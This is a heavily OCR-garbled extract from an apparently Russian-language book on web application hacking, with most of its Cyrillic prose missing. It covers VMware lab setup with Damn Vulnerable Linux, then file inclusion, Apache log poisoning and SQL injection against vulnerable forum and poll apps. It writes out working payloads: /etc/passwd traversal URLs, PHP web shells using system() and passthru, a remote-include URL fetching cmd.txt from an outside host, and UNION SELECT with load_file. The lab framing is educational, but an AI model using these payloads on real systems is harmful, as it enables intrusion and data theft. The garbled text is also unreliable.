Академический Документы
Профессиональный Документы
Культура Документы
9
I. ..............................................................................................
0 1 .0 ....................................................................................................... 12
02. .......................................................................................................................16
II. -............................................................................................. 25
03. ..................................................................................................................26
04. -..................................................................................................................... 31
05. SQL- ................................................................................................................ 47
06. ............................................................................................... 59
07. SQL-.................................................................................................... 70
08. -................................................................................ 83
09. CRLF- .................................................................................................................. 86
III. ?..........................................................................................................87
0. .................................................................. 88
0. ............................................................................................ 94
. ..........................................................................................
102
124
128
140
3. Cyphor.................................... 144
4. SQL-
C yphor.................................................................................... 150
5. SQL- MS SQL Jet ........................................... 152
6. nabopoll.php ........................ 155
7. SQL-
MS Access............................................................................................. 157
8.
instantCM S...........................................................................................
158
9. SQL-............................................... 161
10. ...............................................................................
166
......... 9
11
.................... ............... 12
-.............................. .
............................................................................ 14
02. ............* ...................... ....................................... ..............................
16
. -............................................................................. 25
03.
........................ . . . . ................... ..
26
07. SQL-.............................................................................................70
MySQL @@version.................... 71
mysql.user ..............................................71
........................................................................................ 72
.................................................... 72
/ ............................................... 73
SQL- NaboPoll............. ................................................74
....................................................... 79
............................................. .............................................80
...... ................................................................ 81
08. -.................................. ....................................... 83
/proc/self/environ....................................... .................................83
Apache .................................................................................... 84
...................................................................................84
09. CRLF- ...........................................................................................................86
I I I . ?........................................................................................ 87
0. ............................................................88
0. ................................................................................... 94
. ................................................................................... 102
*-........................................................................ 102
LDAP- ..................................................................... 105
\5- ................................................................................................ 106
0D. ........................................... ............................................ 109
0. .......................................................................
118
,
. ( ,
, ),
- -,
.
, .
,
.
, , ,
,
.
Linux (
Windows), ,
Linux, .
,
( , , ,
, ). ,
, , ,
,
.
( ,
).
,
1995 1999
( , ,
10
**
* > \ * tie ,
^. , ,
. 1\
0* . v .
-00
( '00 nv\\ ).
.
; ' DVD-
I ,inix, D a m n V u ln e ra b le L in u x B a c k T ra c k 4.
vmww ewoN ,
, 02.
' .
, ,
11 .
,
rompnOpH.ei.eom ( , ).
!
-
http:; / www.pltei.rom,
01.
02.
. *nix
Unix- ( , AIX, HPUX, SunOS, Solaris, Linux, FreeBSD, OpenBSD, NetBSD - ).
Windows
Microsoft ,
Windows. , , ,
.
-
:
-? -
. , , ,
- .
- -,
. ,
, ,
, , ,
.
- , , ,
,
( ).
- ,
. , ,
-,
.
-:
( );
;
\3<v*V. ) ''
13
;
( covey auwku,
).
.
>
\;.^
. -
Hacked by . :^\*
. .). , , .
-
.
, ^ vs<v vc\
\
>.
( .)
. )}*'
. ,
<\ -
,
^ ^
.
& .<
^
. , se fc ^'rm
.
,
(
W indow s) ( *nix). xasxfi w&aset
, ,
.^ ;
, .
-
.
. - .'*' trrasv* tov.
( & |> i)
ca^'t
. . & ^.
, - \
, * .
, . *; .
- , .ty^ac: vov.yvv.*
, - wc'
. , W*V >iII
opranvLM
, to ? Vi
.
V .-
14
01.
, , IP . - (proxy),
,
( ). ,
. ,
, .
,
. (),
, -
. ,
-, .
-
, , ,
.
,
, . ,
- ftp-.
free proxy list
.
, IP - (, www.2ip.
ru), , , .
, ,
!
.
, SocksChain
Ufasoft,
.
.
(Virtual Private Network, VPN). ,
(
VPN ). VPN
.
. ,
,
,
. ,
. ru.
, www. hi demyass. com.
.
,
15
( ), .
* .
.
, ,
,
. (.gov)
( .mil) , (.edu).
( , )
( ). ,
.
,
.
. ,
(live-CD) .
.
( )
. , , ,
,
.
,
.
.
,
, ,
.
................--------------------------------------------
( )1 DVD.
)/
...........................................
512 .
- Hack Truck V l\l"0 ' >;<
www.backtrack I Inux.org vlownhvbh ,
. 4 VMwaic, |
' 11 Ubuniu,
, I ,
1, |
. ,
VM war MaytH"
Welcome to VM w a i u Player
1# % whfo h will f t lf f I*
O pen
<\ V t r l i N il M r u h h
# \ ) v H llf t l
\
dyr*tdOaUH**%uh** **|*lI
**
1;%V;teVlpil 1
I JHp
VVnVVW
W
JMf*HflVH41Hi\
!f?|*\
18
0 2 .
Install from:
1 1 Installer disc:
ihjflhfiiMihTIi
SO,,,<i
t'ii
Help
Hext >
1*||
Cancel
. 02.2. , 1
3. , . 02.3,
Next.
4. (. 02.4)
. ,
D V L D am nV ulnerahlcLinux,
. Next.
SH edt a
i.r,c .
19
Gmsst O p e r a tin g S y s t e m
- x e ^ r c s^srjsr: ..4 b e in state d on th is virtu a l m achine?
W rc C 5
~&
< Back
Wext >
j j
Cancel
P c 02-3. , 2
rft4.ju
"Hffi
s-
~-
_;
faext >
i 1
C ancel
0 2 .
2 , 8
(
). *
, 2 , Split virtual
disk into 2 GB files, .
, , 2 ,
. Next
Now Virtual Machine Wizard
Specify Disk Capacity
How large do you want tfres desk to be?
The vfrtuai machines hard desk is stored as one or more ftes on the host
computer's physical <fcfc. These fie fs ) start smal and become larger as you
add applcations, Wes, and data to your virtual macNne.
Maximum dtek (GB):
8.0
virtual
Spitting the dtefc makes it easier to move the virtual mechne to another
computer.
Help
< B **
| i
frxt >
I L.i-SDSSi. .1
. 0 2 .5 . , 4
, Finish ( 02.6).
512 , 250
Damn Vulnerable Linux .
Customize Hardware.
. 02.7. ,
(796 ).
2 ( ), ; ><
. , ,
- Auto
detect (). , , , '( ,
, . 02.0.111
Finish, .
21
R e a d y to I r e a lr V irtu a l M ach in e
Click Finish to c re a te th e v irtu a l m achine an d s ta rt Installing O th e r Linux
2 .6 .x kernel.
The v irtu a l m achine will be c re a te d w ith th e fo llo w in g tfettlngei
Nam e;
Location j
Version:
O p e ra tin g S ystem :
H a rd Disk:
M em ory:
N e tw o rk A d a p te r:
O th e r D evices:
8 GB, Split
25 6 MB
NAT
CD/DVD, F lo p p y, USB C o n tro lle r, S ound C ard
mm
...........................
*'1*** ""*
,
< Back
Finish
..... . .........
Cancel
. 02.6. , 5
mm
D evice
/ M em ory
Sum m ary
P rocessors
0 N e w CD/DVD ( . . .
Floppy
U sing d riv e A:
N e tw o rk A d a p te r
NAT
@ U S B C o n tro lle r
Sound C ard
D is p la y
MB
P resent
896
A u to d e te c t
A u to d e te c t
32 MB
25 6 MB
796 MB
32 76 8 MB
a d d ,,, j )
OK
Cancel
. 0 2 .7 . ,
Help
22
02.
.'..
. 02.8. Removable Devices (
), .
I Finished Installing ( *),
Linux
. ,
Ctrl, . , 6 (
Ctrl+G
).
, Ctrl+Alt (Ctrl Alt ).
Other Limnc 2,6.x kttttwi - VMvf*w
fl
texhash:
texhash;
texhash:
texhash:
Uj>dt ing
Updating
Updat i ng / w / In ^ te v to tttv b '- S v . .
Done,
SUtjM wine
w w ir o w w t!
:1loess**
. .
Login as V oot'1, w ith psssuw ^ W
lo U n iU m t v o te s , lowercase.
SMGh^Ui
. . . t o an* r t j t i f l
file s u a p . . . to create sp e c ia l f i l e fo r |
harddi;
tin u H
dts^eo Is 1 ^ o
2 .0 1 * 1^
a iE x c i
in h
!
J- *''''
vcm
1->
Todirectinputtothevirtuali
. 02.8.
root, Enter.
(password) toor ( root )
Enter. ,
:
bt - #
23
bt , # , .
# $.
Linux.
Linux , ,
Enter.
KDE startx
Enter. :
bt ~ # startx
, .
Linux, , Windows
( , Windows),
.
- ,
,
( Linux),
, .
.O th u r
kerrm l V M w a m P la y e r
D am n 1 LinOM
I n f e c t i o u s JD is e a s e
9tQ0
liM
OfUK
if,;./
Analyze
protection. H i
W f t w ' .............
la tbit virtu*! machine, pro* OrltG,
. 02.9. KDE
24
02.
,
. 02.9.
KDE.
Firefox ( )
. , W indows-.
( ),
(de). ,
,
.
,
.
(Ctrl+Alt),
VM Power Suspend.
.
VMware Player.
Back Track 4,
, , ,
Linux Ubuntu, Linux,
I Finished Installing (
-).
II
-
03.
04.
05.
06.
07.
08.
09.
-
SQL-
SQL-
-
CRLF-
- - -,
. - .
.
. (bug) .
- -,
.
,
(, ).
,
, Linux- -. ,
DVL , http- (-
Apache). HTTPD (
). Konqueror (
Windows). Start HTTPD
. , - . ,
Konqueror , -.
( http ://) Location
Enter.
Board51,
- (http://localhost). (Firefox Konqueror)
http://1ocalhost/webexploitation_package_02/board51/board.php
, , (. 03.1).
, ,
, ,
nix-. Windows
(, D) D:\\Inetpub\wwwroot\board51\.
, -
A pache ( - *-,
27
-1** V'v
*>
. %
|>
tl^P1
v
' ^ ' ''4n ^S v-4 v*
/h
line 3 3
Warning* *\&*0
It not a valid stream resource in
/usr/local a p a ch a \1* ab<?\plolttionwpackage_02/board51/board.php on line 39
i..
. ' ------------------------
*
U
'S
1i
v
d e b a s e d jp h p -b o c u d
i
H w w w tt,
N u t s w ig
ft*
b e im
^ # ^
Onturn
letrtcr Eintrag
OJ Oct 2002
0S.1013
03 1002-05:10:13
von Admin
Niitzur> 9$ h in w e is | D o w n lo a d B o a rd s !
>
far>
0 3 .1 . ( BoardSl
Windows). , - ,
- (-) . ,
, (Internet Explorer, O p
era, Firefox r. it.)* , ,
-. - -
(, ), -,
, . .
, .Boards1
, .
, , ,
. boarddata/data/ussr.idx
, , IC Q h .
, ,
. ( . , ,
ivro 11 ,
.)
http ; /71 1host webexploitat1onjpackageJ)2/board5l/boarddata/data/user. idx
28
03.
AdeiDiUforoeft'Mlim. ste:;
02:06:17:21 ft*y 1 2 1 9 9 :
,
|
1
^
de^ro
com
&
*
</ feta'
1 V 4 1% i^ ^nsi
wW V4V
^ W V#\^1
i ndex -php*ang=rus (. -j-j/. ? InsidePro. *. .
, CAFPC.-A@
jzm '
-g33-~~a -32 ,
(). <'-=; -;
21232f297a57a5a743gS4s:e^l^2 : '
:<^5 - .
fwsbcxplitetion
*l. ^..
!- ^^
^
package_02/bGcrcc.L/ tiGcrc.
I ( .
(admin) ^
.
(Warning), EaHBdL :: ,
cpajses^ ? ? .
(. 031*4)- 11&- ^. _ ^
! . :. 2 >
';
., i*
29
1 |* : 1
ft > \ **
1*\> CWW'HHte*
M ia
A*UM(10)
ftitWftatWfcltWMtftrtfttOlfcl
3+Tnw-^
f n-H-ft-ftf-t * r
T T r - h * 4 + * i w 4 i T i <p j r $ jf* -
CAPTCHAI
*.
4),034*203
*** ?fc*8HjA-v
. 1 9 . 9 6 7 , 9 7 0 ! 1 0 3,427.637
4 M b r n p j ' i i j w r c b .
HifiHH * . 2,165.455.
. 03.3. -
3 ! 3 5 ^ % te fo rg e
lo c a tio n
- &
1 1
cJU
!% ,
y iw
5,<^^
: ;/? .
/ \
,*>;
' '
ijcip
i r j
W indow
N*ues Forum
Konfiguratioft
$$
. 0||# <*
,
Abmeld#n
Them
H in w ie , E rs te N u tz u n g
N e r z lic h w illk o m m e n , f a 1
S c h re ib e n w u n s c h t U f o r g
Vtel S p ^ S b e im
.I
------ -------------.
Anqemeldet als AdminAdmin
Besucheronline ; 1
j
Datum
letzter Eintrag
03 Oct 2002
05:10:13
03 1002-05:10:13
von Admin
Th re a d s Eintrage Status
00
. 03.4. Board51
, IP - .
. , , .
30
03.
IP - ,
. ,
TCP/IP, IP-, .
IP 4 IP- (
0 254), , :
192.168.2.11. () IP -, ,
1- 127.0.0.1.
, .
1 65 535.
, .
- , , .
, - 80, FTP 21.
, ,
, , . ,
, , 1-
, . ,
-, IP 80,
, -. -, ,
IP- ( , )
-.
.
, -,
includeO , -
. ,
. (V/r . vndxide
[-]). (Local File Include,
L F I) (Remote File Include, RFI).
.
, ,
HTTP FTP .
, ,
. .
-
. :
http://[target]/index.php?page=./../etc/passwdXOO
[target] ,
www.site.com. /etc/pass*':.
:
. / ;
.. / , Unix- .
HTTP (null-byte).
. ,
,
. php .tx t.
: /etc/passwd. php, .
, .
32
04. -
index.php . , Dam nV u ln e ra b le lin u x
- /usr/locaT/apache/htclocs/. ,
(
.. /) 4 , .
, lit docs,
. ,
-,
, ,
.
/usr/local/apache/htdocs/
-. ,
, -,
.
( Windows)
Damn Vulnerable Linux Tools Editors Kate,
Kate ( , ,
). Default Session (
, , , D V L ).
( ^!)):
<?
$page - ($_GETC'']):
includeC.7htdocs/$page.php");
?>
(-)?
. , , .
$,
, .
htdocs (
$)
.php. . ,
( ) . ,
, ,
. ( File Save)
/usr/local /apache/htdocs. ,
, Enter
. .
my.php , Save. 11
, .php.
. .
(F ir e f o x K o n q u e r o r )
:
http://1 !host/my.php?page=. / . . /etc/passwd^OO
33
localhost
( : www.Hte.com).
, . 04.1,
lo e li
4 ! .4
.......H M M M M I>*"('** *
I.
directory
loaded.
. 04.1. /etc/passwd
!
.. / ,
http://local host/nay.php?page-/etc/passwdfcOO
http://loca1host/n\y.php?page-./.. / . . / . ,/etc/passwd*00
,
/etc/passwd, . 04.2.
! !
/etc/passwd , :
. .
View View Document Source ( Konqueror)
View Page Source ( Firefox)
(. 04.3).
0 4 . -
http //localbost/m y p h p -K o n q u e r o r
atien
dit
y i w
'sookm arkft
lo o l
Settings
W ind o w
tietp
jjjy http.//1oclhost/my.php?pge*./../../../../../etc/passwd%00
Page loaded
. 0 4 .2 . /etc/passwd
r o o t : : Q:Q: : / r o o t : / b i n / b a s h
b i n : ; 1 : 1 b i n / b i n ;
d a em o n :x; 2 : 2 : daemon: / s b i n :
d m : x : 3 : 4 1adm : / v a r / l o g :
lp :x :4 :7 :lp :/v a r/s p o o l/lp d :
s y n c ix j5 i D : s y n c : / s b i n : / b i n / s y n c
s h u t d o w n : x : 6 ; O: s h u t d o w n : / s b i n : / s b i n / s h u t d o w n
h a l t ; x i 7 : :h a l t :/s b i n :/ s b i n / h a l t
m a il:x :8 ;1 2 :m a il:/:
news j x ! 9 : 1 3 : n e w s ; / u s r / l i b / n e w s :
. 04.3. /etc/passwd
/etc/passwd? ,
() .
. (
root). root (
) 0 0.
. ,
/etc/shadow ( FreeBSD
: /etc/master.passwd). /etc/shadow,
, , ,
.
? , .
,
35
, /etc/shadow.
, .
/etc/shadow
root , root.
,
. , ,
,
( ). ,
Linux - /etc/shadow
.
http://l ocalhost/rr\y.php?page=./.,/etc/shadow^OO
, ,
root, - A p ach e, ,
,
Permission denied ( , ).
/etc/shadow ,
.
00 (
)
http://localhost/.php?page=./.. / . . / . . / . . / . . /etc/passwd00
, . /etc/shadow, ,
? ?
-------------------------------------------------------------
. .
-
,
, ,
.
, *nix, .
http://[target]/i nj.php? i nc=http://narod.ru/cmd.txt&cmd=ls
cmd.txt
http://narod.ru. Is,
.
36
04. -
(File New)
:
<?
Spage | ($_GET[**]):
include("$page"):
?>
-.
my. php
i n j. php (File Save As) , my. php.
, i ncl ude htdocs
. php, ,
. ,
.
, (,
FTP). .
<>
<?php
print("<b>$cmd</b>\n");
systemdcmd);
?>
</pre>
cmd. php , i nj . php.
HTM L <> </> ,
(
). pri nt $cmd
,
. system() ,
$cmd, .
, ,
:
http://1 !host/i n j.php?page=http://1ocalhost/cmd.php?cmd=ls
, - . 04.4.
1s,
.
, -
, .
i nj .php cmd.php,
Parse error: , , ,
.
.
fc\M
Je o li
37
EXXB
Jftttndow ti*Jp
% ,
** ;y * \ \ **.
l> \
vjv
\0bhttftMiutttwffcrifti.phf)/^oca>ho%t/cmd.php?crncl-l5
It
#|
b#tf
CNld * php
cmd*phpindex*php
infophp
*
in j ,php
inj .phpRNtOUil
my .php
o lit t
phpmyadmin
unicornsctn
wtbtxploi t t i n_pa kage_01
W4>bxploitai\ion_package_Q2
I*op foftdtd
. 04.4. Is
, Is *-.
11, uname ( Unix-,
).
pwd (print working directory
) id ( ).
ion, nobody (
u1d-99), nogroup (
g1d-99). 1Iomhmo , ,
groups. , Linux-
- nobody.
dir, , Is,
, .
, ,
.
, .
, ( . shell ) "nix-,
(). *nix ,
Windows, CMD.exe. *nix-
bash sh.
, "nix- . Unix
(-), (--)
38
04. -
. , uname -
Unix-. ,
. , Is -1
,
( *nix
).
----------------------------------------------------------------------_
Linux Unix ,
- .
,
Is -al Is -la. -
. ,
.
? Linux $IFS,
().
1s$IFS-l . , ,
! . 04.5.
-:
<><? system( $_GET[' cmd' ]); ? x /p re >
, + ,
Is -la 1S+-1. .
. 04.5 .
(total). drwxr-xr-x? d
, (-).
, ,
, ,
:
(read);
w (write);
(execute).
:
-rw--w-- 1 bob csc532 70 Apr 23 20:10 file
drwx.....2 sam Al 2 May 01 12:01 directory
To
( , . 04.5
root, , , bob sam).
, .
Location
dtt
yiew
J&ookmarks
I o o lt
c*tmgs
&r>dow
ls$IF S - la
t o t a l 37
d rw x r-x r-x
d rw x r-x r-x
d rw x r-x r-x
d rw x r-x r-x
- rw- r - - r - I rw - - - - - rw -r-- r - - r w -- - - - rw- - - - - rw - - - - - rw - - - - - rw - - - - - r w -r -- -d rw x r-x r-x
- rw -r-- r- d rw x r-x r-x
d rw x r-x r-x
d rw x r-x r-x
d rw x r-x r-x
d rw x r-x r-x
10
16
13
10
1
1
1
1
1
1
1
1
1
8
1
9
12
5
7
19
ro o t
ro o t
ro o t
ro o t
ro o t
ro o t
ro o t
ro o t
ro o t
ro o t
ro o t
ro o t
ro o t
ro o t
ro o t
ro o t
ro o t
ro o t
ro o t
ro o t
39
ro o t 220 Jun 16
ro o t 107 Jan 18
ro o t 936 Jan 18
ro o t 107 Jan 18
ro o t
62 Jun 16
ro o t
37 Jun 16
ro o t
81 Jun 16
ro o t
79 Jun 16
ro o t
79 Jun 16
ro o t
66 Jun 15
ro o t
24 Jan 18
ro o t
49 Jun 16
ro o t
53 Jun 16
ro o t 2319 Jan 18
ro o t
66 Jun 15
ro o t 377 Jan 18
ro o t 1840 Jan 18
ro o t 172 Jan 18
ro o t 119 Jan 18
ro o t 366 Jan 18
1 7 :0 8
2609
2009
2009
1 7 :0 8
16 :53
1 6 :0 8
1 6 :0 8
1 6 :07
2 2 :4 2
2009
0 1 :2 1
0 1 :1 6
2009
2 1 :5 5
2009
2009
2009
2009
2009
i
__1 ....
base
beef
cmd.php
a n d .p h p cm d.pl
c ro d .p lc m d .tx t
in d e x .p h p
in fo .p h p
i n j .php
i n j .p h p manual
my.php
o la t e
phpmyadmin
u n icornscan
w e b e x p lo ita tio n _ p a c k a g e _ 0 1
w e b e x p lo ita tio n _ p a c k a g e _ 0 2
. 04.5. Is -la
() ,
. . 04.5 root (
).
, ,
. ,
. , , , abc
(d), root root:
drwxr-xr-- 10 root root 107 Jan 18 2009 abc
, (rwx),
, (-),
(--). , 18 2009
(Jan 18 2009).
Is -lad.
.
( root) chown
.
() chmod. ,
, ( 7) ,
40
04. -
( 5) (
):
2 ;
3
5 ;
6
(, ).
( root)
, .
- . cat
, . ,
cat /etc/passwd /etc/passwd. ,
- : cat$IFS/etc/passwd
: cat+/etc/passwd.
*nix, *nix.
1.
-
NaboPoll
NaboPoll
( survey. 1nc.php, path) ,
( , , ) .
,
, :
http://local host/webexploi tati on_package_02/nabopol1/
survey, 1nc.php?path-http://1ocalhost/cmd.php?cmd=ls$00
. 04.6.
41
\\\\
\
> Apache
Q^aboBoll/sun/eyinc.pbp *
blp
\
$*\ $. V*** |vy*ki4*A Awfei
|| . .
fc>ctito* ^
&
^ \
.... .
S3
U
base
Cmd .php
cmd.pfopcmd p i
cmd.p i*
cmd. txt
images
index,^hp
info,php
in} xphp
in j >ph$*manual
my ,php
o la te
phpmy*4mi*
unicornscan
webex p IvM t a t \\>n p a \a a%
J> I
wefcexplcoLtatxo* ^ ^ ^ 9 ^ 6 2
. 0 4 ., <$.
:V\vw eM ? Is NaboPoll
-
Apache
(Vvvee , *
, () Apache. ,
Apache ^ httpcl-access.log httpd-error.log,
- (
| access, U\x ' , , error. 1).
D V I : accessjog 9,
/usr/local/apache/logs. ,
\^ kv, -,
, :
M-.pd.://UvAi*KKt
9*'/"/</logs/accessJog^OO
1la access_log.
no telnet 80 :
telnet. ,0,0 90
:
42
04. -
access-log:
127.0.0.1 - - [30/Jun/2010:13:00:40 +0200] "GET <pre><?passthru($_GET[cmd']);?>
</pre> HTTP/1.1
b t / # t e ln e t 1 2 7 * 0 .0 ,1 80
T ry in g 1 2 7 * 0 ,0 ,1 ,
Connected to 1 2 7 .0 ,0 .1 ,
Escape c h a r a c te r i s f p j ' ;
GET <pre><? p a s s th n i($ _ G E T [ c t d 1 ] ) ;? > < /p re > H T T P /1.1
H TT P /1,1 4 0 0 Bad Request
D a te : Sun, 27 Jun 2 0 1 0 1 9 :4 6 :5 8 GNT
S e rv e rt A p a c h e /1 ,3.37^ (U n ix ) P H P /4 ,4 .4
C on nection: c lo s e :
/
u A r 'V ':
C o n ten t-T yp e: t ^ t / h t i l f c h a r s e t ^ s d f 8 ^ r ; iv ! .^ v | l
<*D0CTVPE HTHL PUBLIC - / / / / 0 H W L 2 , / >
<HTMlxHEAD>
<TITLE>400 Bad R ^ e s O T l E >
^
^
v
</HEADxBODfy>
<Hl>Bad R e q u e s t ^ l > I
Your brow ser s e n t a re q u e s t t h a t t M s s e r v e r c o u Id n o t understand,,<P >
T he re q u e s t l i n e c o n ta in e d i n v a l i d . ! ^ fo llo w in g th e .p r b to e o l s t r i n g .
5/1
-S e iv e r a t f &t .
ied by fo r e ig n h o s t .
S S I
, , r\ ' 4
. 04.7. - Apache
- , ,
,
, , .
, , accessjog,
.
, GET, .
- Referer User-Agent,
( !):
I telnet 127.0.0.1 80
Trying 127.0.0.1...
Connected to local host.
Escape character is
GET 1 HTTP/1.1
- Apache
43
Accept; */*
Accept 'I diHiUfiiji:
Aecspt Encoding: clsf'lflib
User Ayent: lynx/2,8.Brel,1 llbwww-FM/2,14
Host; 127.0.0.1
Connection! Close
Referer: http:/7127,0,0,l/<pro><?passthru($jGET['cmd']);?></pre>
I I Enter.
Referer, User-Agent.
:
httpd://l0calh0St/1ndex,php?page-i/,./1 ogs/access_log^00&cmd-1 s+-1a
I lain - +, Is -la.
.
access_Jog,
(. 04.8).
', errorjog . ,
I tpd ( FTP),
, Apache, - ( ,
location fcfM
,
fll
/'/I//,/iij/i
/X
'/,'/<"'> WHiiMnnwflUrWh
4 IfiilM lM lfilir;1;;;
....'-.
. 0 4 .8 , - access_log
44
04. -
- ).
, , ,
txt, 1 . .
, .
. , .
- <><? passthruC$_GET[' cmd ' ]); ?><>, avatar.gif
, :
http://[target]/forum.php?page=./../smi 1eys/avatar.gi & s
.
, avatar.gi f ,
- .
-
-. :
/logs/error.log
/logs/access.log
/logs/error_log
/logs/access_log
/var/log/error_log
/var/log/access_log
/var/log/error.log
/var/log/access.log
/var/www/logs/error_log
/var/www/logs/error.1og
/var/www/1ogs/access_log
/var/www/logs/access.1og
/var/log/apache/errorjog
/var/1og/apache/error.1og
/var/1og/apache/access_l og
/var/1og/apache/access.log
/var/1og/httpd/error.1og
/var/1og/httpd/access.1og
/var/1og/httpd/errorJ og
/var/1 og/httpd/accessJ o g
,
(switch case). -:
45
<?php
global $page;
switch ($page)
{
case ' :
Include ("pages/maln.php");
break;
case 'Index':
Include ("pages/maln.php");
break;
case 'p a g e l':
Include ("pages/pagel.php");
break:
case 'page2':
1nc 1ude 11pages/ page2.php"):
break;
default:
Include ("pages/error.php"):
break;
}
?>
str_re p la c e ().
, php. ini
:
allow_url_1nclude - Off
allow_url_fopen - Off
eg1str_g1oba1s - Off
mag1c_quotes_gpc-0n
safe_mode - On
//
// fopen
//
// " " (00)
// safe_mode.
/ / /etc/passwd
P H P -,
:
<?php
reset ($array)
while (11st($key,
$val) - each($array))
46
04. -
return Sarray;
}
if (!getjnagi c_quotes_gpc())
{
strips'! ashes_for_array($_POST):
stripslashes_for_array($_GET);
}
if(isset($_GET['file']))$fi1e=$_GET[*file'];
else
{
$fi 1e);
}
include("include" . ' ,$file.'.php');
?
stri psl ashes(), . ,
. (' /'
1.') str_repl (). (
fi 1e_exi sts ()), $file=' news'.
.
- ,
-, , .
.
SQL-
SQL- Cypher.
http://localhost/webexploitati__1!2 fcy dh o r .
. 05.1.
IflC V b w
6<t
&&kmwics Todz.
Ssrings jmde*
*
' & 3 * \ \ ^
iQCOtiOn fa nftp://)/01IHClaQe 02'C^l"
M y D is c u s sio n s
,/CSC 2 ^
( u pQSfcS} I I
Login
Guest access granted. You have to rep>ste^ ifyou want to post messages.
U sernam e::
-g ^ - -escs
S earch
F in d :;
in Field: Text
Forum s
^esrer
in rsrurrj:
re - f& m rtz v s*
\
UetiftI
-*
}'\<\*
. 05.1. Cyphor
n^msg.plm. .
e x it.
# ( . 05.2 )
. .
. ,
Cyphor
.
, , newws9,Dfcp SQL fid ( SQL-
48
05. SQL-
B<r
//
//
A l e x
//
f f ig t lie f t p
//
$ ,
e r s t - e ll e n
S u z u k i,
e r s t e l l t
P a r a m
e t e r
7 ,
Q f c t & b tr
2 0 0 0
p it f
|jj|........................
//
in c lu d e . { * in c lu d e / d b _ a y s q l ,p h p x ) ;
i n c l u d { " i n c l u d e / s e t t i n g s . p h p eJ I
incltt&gi*i n c l u d e / g l o b a l , p h p * } |
/ * Include the file V
$tang_fiX< " l a n g / * , ^ langua ge , " . p h p * ;
in c it ic le { $ l a n g _ f i i e ) |
open__session{ | ;
if
( $ l o g i n && $ p e s s)
lo g in ( $ lo g in , $ p a ssj;
e ls |
e x it _ p a g e jr fit h _ 5g ($ te rr_ n o tJto g g e d _ :in ,
.
>
111J;
i n d e x , p h p , f t ^ l o g i n )i
. 05.2. newmsg.php
(SQL-injection)? SQL,
. SQ L (Structured Query Language
) . SELECT
. , SELECT id, password
FROM users id password users, SELECT * FROM
users users.
, (,
). SQ L-, INSERT (
) UPDATE (, ),
, .
UNION . :
SELECT fid, title FROM forums UNION SELECT nick, password FROM users
,
. , UNION
,
. , ,
SELECT, .
.
(1, 2, 3...), (
), (nul 1)
SQL-. .
( FROM),
, .
, cyphor_users,
SQL-
49
:
http://1 !host/webexploitation_package_02/cyphor/newmsg.php?fid=-1 union select 1
from cyphorjjsers
,
, . SQL,
( ) MySQL,
/* ( --),
. . 05.3.
Location'
dit
View
Qo bookmark!*
Location;
Tools
Settings
window
Help
\
Ift
ho5tfwebexploltation_packege_O2/cyphor/nevvmsigKphp7fidl%2Ounlon%2Oselect%2Dl%20from%2Qcyphor-users;'r !
N ot logged in!
c y p h o r jjs e r s
Database error; 1222 (T he used SELECT statem ents h a ve a d iffe re n t n u m b e r o f colum ns)
Page loaded.
, SQL
( ), ,
.
,
(%20). ,
(+) /**/,
.
, .
(union select 1,2,3,4 from cyphorjjsers),
(. 05.4). ,
, .
50
05. SQL-
; Kooqueror
location
dit
View
4
E>Location:
Qfi
&ookmarks
Iools
Settings
Window
a
2/cyphor/newmsg.php?fldl%2Ounion%2Ose(ectt(>2Ol,2,3.4%20from%2Ocyphor_U!bersj'*
j^
u
LflfllP
rn:r
From:
Subject:
_____ __ __
il
tj&j&tegssxis#
2.
nick ( ,
Cyphor). . 05.5
( admi ).
m? - Konqueror
Location
Edit:
View
goofcmarks
Jools
Settings
Window
Help
0t| | | ..1... 4
% 'rs> |
> Location:
^hor/newmsg.php?fid=l%20union%20sdect%201,nick3,4%20from %20cyphor^u5ere]^ j ]
f
Line breaks areprocessed, you don't need to force them through <B8>. HTML tags w f be filtered/ Links wautomatical be
generated.
From:
p..~...
1
Subject:
^1/
I
I
i
ij
>
Ii
j
i
i
i
... .
.....
.-------k.
11 V
m
>ED
11Sff
t.t Ij
Page loaded.
2 password
admi (. 05.6).
Cyphor cry p tO ,
(
SQL-
; ')\
51
ndow
be
Qemreted.
From:
Subject:
ii
ii
ii
i
. 05.6. admin
).
, ,
Cyphor ,
8 , ,
. ,
DES,
John The Ripper (. ). , Cy
phor ( ),
(. 3).
M ySQL ( ),
M ySQL . , ,
versionO, userO databaseO.
concat_ws:
concat_ws(0x3a,version()Iuser(),database())
().
:
5,0.24:root@11host:cyphor
/1
concat, :
concat(name,0x3a,id)
,
group_concat, :
group_concat(passwod)
Cyphor,
, ( ).
52
05. SQL-
/etc/passwd.
MySQL 1oad_f 11 (' etc/passwd1).
( ),
:
1oad_fi1(0x2f6574632f706173737764)
,
(. 05.7).
Location
dit
: '% ft:
yiew
oofcmerto
J p o
Is
Sellings
: P 4 .4 4
Window
jdp
*
'
N o t lo g g e d in i
Loain
N e w m e s s a g e in f o r u m " r o o t : x : Q : 0 : : / r o o t : / b in / b a s h b in :x :1 :1 : b in : /b in :
d a e m o n : x : 2 : 2 : d a e m o n : / s b in : a d m : x : 3 :4 :a d m :/v a r /lo g : lp : x : 4 : 7 : lp : / v a r / s p o o l/ lp d :
s y n c : x : 5 : 0 : s y n c : / s b in : / b in / s y n c s h u t d o w n : x : 6 : 0 : s h u t d o w n : / s b in : / s b in /s h u t d o w n
h a lt:x :7 :0 :h a lt:/r > b in * 7 s b ln /h a lt m a il:x :0 :1 2 :m a il:/: n e v /s :x :9 :1 3 :n e v /s :/u s r /lib /n e w s :
u u c p : x : 1 0 : 1 4 : u u c p : / v a r / s p o o l/ u u c p p u b lic : o p e r a t o r : x : 1 1 : 0 : o p e r a t o r : / r o o t: / b in / b a s h
g a m e s :x :1 2 :1 0 0 .g a m e s :/u s r /g a m e s : ft p : x : 1 4 :5 0 ::/h e /ftp :
s m m s p : x : 2 5 : 2 5 : s r r im s p : / v a r / s p o o l/ c lie n t m q u e u e :
m y s q l: x : 2 7 : 2 7 :M y S Q L : /v a r / lib / m y s q l: / b in / b a s h r p c :x :3 2 :3 2 :R P C p o r tm a p
u s e r ^ T b in / f a ls e s s h d r x : 3 3 : 3 3 : s s h d : / : g d m ^ c :4 2 :4 2 :G D M * y v a r /s ta te /g d m * ib in /b a s h
p o p :x :9 Q :9 0 :P O P :/: n o b o d y : x : 9 9 : 9 9 : n o b o d y : / : p o s t g r e s :x :1 0 0 0 :1 0 0 ::/h o m e / p o s t g r e s :
# Arrafc? z r e p ro c e s s e d , y o u d
g e n e ra te d .
___Crnm; v
fa g e loaded.
. 0 5 .7 . /etc/passwd loadjfile
2 SQ L- show.
php, 4 SQ L-
.
.
,
SQ L-:
param=l union select 1,2,3,4,5,6,7,8,9,10,11,12.13,14
,
